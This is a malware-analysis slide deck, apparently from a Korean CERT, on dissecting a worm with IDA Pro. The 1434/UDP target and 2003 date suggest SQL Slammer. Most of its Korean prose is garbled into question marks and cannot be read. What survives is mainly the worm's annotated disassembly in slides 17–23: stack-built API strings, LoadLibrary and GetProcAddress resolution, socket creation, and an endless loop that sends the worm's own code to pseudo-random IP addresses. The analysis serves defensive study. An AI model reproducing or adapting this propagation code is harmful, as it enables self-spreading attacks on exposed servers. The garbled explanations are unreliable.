
Title: Ida? ??? ?? ???? ??


1
Ida? ??? ?? ???? ??
  • ???
  • ?????? CERT
  • mat_at_monkey.org

2
Ida Pro
  • ??????? ??? CPU Instruction? ????.
  • ??? ??? ????.     
  • ???? ?? ?? ? ? ??.

3
?? ?? ??? ?? Ida
  • ??? CPU Instruction???? ?? ?? ???? ???? ?? ?? ??? 
    ?? ? ? ??.
  • ?? ??? ??
  • ?? ??? ??? ????? ???? ??? ???? ??? ??.
  • Ida? ? ????? ?? ??? ??? ?? ???? ??? ????.

4
?? ??
  • ????
  • 2003.1.25? ?? ????? ?? ?? ???.
  • ????????? ???.

5
??? ??
  • ???? IDS? ??? ????? ??? ????.

6
??? ??
  • ?? ???? ????? ethereal? ???? ??? ?? ??.
  • ??? ????? ??? ?? ??? ??.

7
??? ??
  • ??? ?? ??? ??? ??? ? ??.

8
?? ??
  • ida? ???? ?? ???? ??? ???.

9
?? ??
  • 32??? ????? ??.

10
?? ???
  • ????? ???? ?? ????? ????.

11
??
  • ??? ??? ???.

12
?? ?? ??
  • ??? ?? 0x90? ???? ??? ?????.

13
??? ??
  • C ?? ??? ? ?? ??? ??? ????.

14
??? ??
  • ??? ?? ??? ???? ??? ??.

15
??? ??
  • ??? ??? ?? ??? ???? ?? ??.

16
??
  • ??? ??? ?? ????.

17
Shellcode Part Start
    nop nop nop nop nop nop nop nop
    push    42B0C9DCh
    mov     eax, 1010101h
    xor     ecx, ecx
    mov     cl, 18h
18
Stack ??
loc_DD:                             ; CODE XREF: seg000:000000DE j
    push    eax
    loop    loc_DD
    xor     eax, 5010101h
    push    eax
    mov     ebp, esp
    push    ecx
    push    6C6C642Eh               ; ".dll"
    push    32336C65h               ; "el32"
    push    6E72656Bh               ; "kern"
    push    ecx
    push    746E756Fh               ; "ount"
    push    436B6369h               ; "ickC"
    push    54746547h               ; "GetT"
    mov     cx, 6C6Ch               ; "ll"
    push    ecx
    push    642E3233h               ; "32.d"
    push    5F327377h               ; "ws2_"
    mov     cx, 7465h               ; "et"
    push    ecx
    push    6B636F73h               ; "sock"
    mov     cx, 6F74h               ; "to"
    push    ecx
    push    646E6573h               ; "send"

Stack is now:
    ebp-10  kernel32.dll
    ebp-20  GetTickCount____
    ebp-2C  ws2_32.dll__
    ebp-34  socket__
    ebp-3C  sendto__

19
LoadLibrary GetProcAddress
    mov     esi, 42AE1018h          ; LoadLibrary address?
    lea     eax, [ebp-2Ch]          ; "ws2_32.dll"
    push    eax
    call    dword ptr [esi]         ; call LoadLibrary("ws2_32.dll")
    push    eax                     ; ws2_32.dll handle
    lea     eax, [ebp-20h]          ; "GetTickCount"
    push    eax
    lea     eax, [ebp-10h]          ; "kernel32.dll"
    push    eax
    call    dword ptr [esi]         ; call LoadLibrary("kernel32.dll")
    push    eax                     ; kernel32.dll handle
    mov     esi, 42AE1010h          ; GetProcAddress?
    mov     ebx, [esi]
    mov     eax, [ebx]
    cmp     eax, 51EC8B55h          ; Check if this GetProcAddress value is valid
    jz      short loc_157           ; GetProcAddress(kernel32.dll handle,"GetTickCount")
    mov     esi, 42AE101Ch          ; GetProcAddress

20
Call Socket
loc_157:                            ; CODE XREF: seg000:00000150 j
    call    dword ptr [esi]         ; GetProcAddress(kernel32.dll handle,"GetTickCount")
    call    eax                     ; call GetTickCount
    xor     ecx, ecx                ; ecx = 0
    push    ecx                     ; pad
    push    ecx                     ; pad
    push    eax                     ; return value of GetTickCount -> [ebp-4c] sin_addr
    xor     ecx, 9B040103h          ; filling struct sockaddr_in: sin_family, sin_port
    xor     ecx, 1010101h           ; [ebp-50] = 9a050002
                                    ;   sin_port = 9a05 -> 0x59a = 1434
                                    ;   sin_family = 2
    push    ecx
    lea     eax, [ebp-34h]          ; "socket" address
    push    eax
    mov     eax, [ebp-40h]          ; ws2_32.dll handle
    push    eax
    call    dword ptr [esi]         ; GetProcAddress(ws2_32.dll handle,"socket")
    push    11h
    push    2
    push    2
    call    eax                     ; call socket(2,2,17) = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)

21
Send
    push    eax
    lea     eax, [ebp-3Ch]          ; "sendto" address
    push    eax
    mov     eax, [ebp-40h]          ; ws2_32.dll handle
    push    eax
    call    dword ptr [esi]         ; GetProcAddress(ws2_32.dll handle,"sendto")
    mov     esi, eax                ; esi = sendto address
    or      ebx, ebx
    xor     ebx, 0FFD9613Ch

22
Stack Map
Stack is now:
    ebp-10  kernel32.dll
    ebp-20  GetTickCount____
    ebp-2C  ws2_32.dll__
    ebp-34  socket__
    ebp-3C  sendto__
    ebp-40  ws2_32.dll handle

    struct sockaddr_in
    -----------------------------------------
    ebp-44  0
    ebp-48  0
    ebp-4c  GetTickCount result    sin_addr
    ebp-4e  9a05                   sin_port   (9a05 -> 0x59a = 1434)
    ebp-50  0002                   sin_family (= 2)
    -----------------------------------------

    /* Structure describing an Internet (IP) socket address. */
    #define __SOCK_SIZE__   16      /* sizeof(struct sockaddr) */
    struct sockaddr_in {
        sa_family_t         sin_family;     /* Address family */
        unsigned short int  sin_port;       /* Port number */
        struct in_addr      sin_addr;       /* Internet address */
        /* Pad to size of `struct sockaddr'. */
        unsigned char       __pad[__SOCK_SIZE__ - sizeof(short int)
                                  - sizeof(unsigned short int)
                                  - sizeof(struct in_addr)];
    };

23
Packet Sendto loop
packet_sendto_loop:                 ; CODE XREF: seg000:000001C8 j
    mov     eax, [ebp-4Ch]          ; struct sockaddr_in -> sin_addr
    lea     ecx, [eax+eax*2]        ; get random address
    lea     edx, [eax+ecx*4]        ;   (the lea/shl/add/sub steps below multiply eax by 214013)
    shl     edx, 4
    add     edx, eax
    shl     edx, 8
    sub     edx, eax
    lea     eax, [eax+edx*4]
    add     eax, ebx
    mov     [ebp-4Ch], eax          ; sin_addr setting
    push    10h                     ; socklen_t tolen = 0x10
    lea     eax, [ebp-50h]
    push    eax                     ; struct sockaddr_in *to
    xor     ecx, ecx
    push    ecx                     ; flags = 0
    xor     cx, 178h
    push    ecx                     ; len = 178h
    lea     eax, [ebp+3]
    push    eax                     ; data = start of this code
    mov     eax, [ebp-54h]
    push    eax                     ; socket handle
    call    esi                     ; call sendto
    jmp     short packet_sendto_loop ; struct sockaddr_in -> sin_addr
seg000  ends
        end